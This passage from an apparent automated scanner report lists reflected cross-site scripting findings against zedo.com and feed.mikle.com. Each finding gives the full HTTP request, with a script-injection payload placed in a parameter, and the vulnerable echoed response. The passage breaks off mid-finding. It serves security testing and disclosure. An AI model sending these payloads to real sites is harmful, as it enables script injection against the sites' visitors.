Set-Cookie: FFcat=0,0,0:767,4,94:826,471,9:767,4,9:767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0]]>>;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=222
Expires: Sun, 04 Sep 2011 04:18:20 GMT
Date: Sun, 04 Sep 2011 04:14:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/d8;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-504/d8/jsc/fm.js;qs=2d416'-alert(1)-'40b5877820a=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

6.106. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7f5c'%3balert(1)//7d7a8394a95 was submitted in the q parameter. This input was echoed as b7f5c';alert(1)//7d7a8394a95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=b7f5c'%3balert(1)//7d7a8394a95&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=78:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=147
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:32:11 GMT
Content-Length: 4697
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='b7f5c';alert(1)//7d7a8394a95,5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b7f5c';alert(1)//7d7a8394a95,5da07'-alert(1)-'6ad983039ac,baeb2%2
...[SNIP]...

6.107. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5e2d'><script>alert(1)</script>2baa6b3dd54 was submitted in the rssmikle_css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=b5e2d'><script>alert(1)</script>2baa6b3dd54&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<link rel='stylesheet' type='text/css' href='b5e2d'><script>alert(1)</script>2baa6b3dd54' />
...[SNIP]...

6.108. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_font_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_font_size request parameter is copied into the HTML document as plain text between tags. The payload 4bf24<script>alert(1)</script>69e64f94276 was submitted in the rssmikle_font_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=144bf24<script>alert(1)</script>69e64f94276&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:325px;height:200px;font-size:144bf24<script>alert(1)</script>69e64f94276px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA;background-image:url(http://);}
#header .feed_title{margin:0;
...[SNIP]...

6.109. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_frame_height request parameter is copied into the HTML document as plain text between tags. The payload feabe<script>alert(1)</script>d3c548e0b85 was submitted in the rssmikle_frame_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200feabe<script>alert(1)</script>d3c548e0b85&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:325px;height:200feabe<script>alert(1)</script>d3c548e0b85px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA;background-image:url(http://);}
#header .feed_
...[SNIP]...

6.110. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_frame_width request parameter is copied into the HTML document as plain text between tags. The payload 64ad0<script>alert(1)</script>1d270771969 was submitted in the rssmikle_frame_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=32564ad0<script>alert(1)</script>1d270771969&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:32564ad0<script>alert(1)</script>1d270771969px;height:200px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA;background-image:url(http://);}
#
...[SNIP]...

6.111. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload bff5f<script>alert(1)</script>0d9a5f4cd41 was submitted in the rssmikle_item_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFFbff5f<script>alert(1)</script>0d9a5f4cd41&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
or:#FFFFFF;text-decoration:underline;}
#header .feed_title a:active{color:#FFFFFF;text-decoration:none;}
#content{margin:0px;padding:5px 0px 0px 0px;background-color:#FFFFFFbff5f<script>alert(1)</script>0d9a5f4cd41;background-image:url(http://);}
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;pad
...[SNIP]...

6.112. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgcolor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ccbf'%3balert(1)//88177ed0805 was submitted in the rssmikle_item_bgcolor parameter. This input was echoed as 5ccbf';alert(1)//88177ed0805 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF5ccbf'%3balert(1)//88177ed0805&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<PARAM NAME="BGCOLOR" VALUE="#FFFFFF5ccbf';alert(1)//88177ed0805">
...[SNIP]...

6.113. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgimage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 10e16<script>alert(1)</script>eba7c1243f0 was submitted in the rssmikle_item_bgimage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F10e16<script>alert(1)</script>eba7c1243f0&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
derline;}
#header .feed_title a:active{color:#FFFFFF;text-decoration:none;}
#content{margin:0px;padding:5px 0px 0px 0px;background-color:#FFFFFF;background-image:url(http://10e16<script>alert(1)</script>eba7c1243f0);}
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;padding:1px 2px 1px 3px;color:#2
...[SNIP]...

6.114. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_description_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_description_color request parameter is copied into the HTML document as plain text between tags. The payload 5ed3e<script>alert(1)</script>3e11fc0155b was submitted in the rssmikle_item_description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%236666665ed3e<script>alert(1)</script>3e11fc0155b&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
A3;text-decoration:none;}
#content .feed_item_podcast{margin:0 0 0 3px;padding:0 0 0 3px;}
#content .feed_item_description{margin:0 0 0 3px;padding:0 2px 0 3px;color:#6666665ed3e<script>alert(1)</script>3e11fc0155b;line-height:135%;}
#footer{display:none;height:0px;margin:0px;padding:0px;color:#FFFFFF;background-color:#FFFFFF;background-image:url(http://);}
</style>
...[SNIP]...

6.115. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_podcast parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_podcast request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc5a'%3balert(1)//b618cdd9d71 was submitted in the rssmikle_item_podcast parameter. This input was echoed as ccc5a';alert(1)//b618cdd9d71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=iconccc5a'%3balert(1)//b618cdd9d71 HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
rseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank';
var itemPodcast = 'iconccc5a';alert(1)//b618cdd9d71';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj = document.getElementById('
...[SNIP]...

6.116. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_title_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_title_color request parameter is copied into the HTML document as plain text between tags. The payload 1f355<script>alert(1)</script>578c7374c8 was submitted in the rssmikle_item_title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

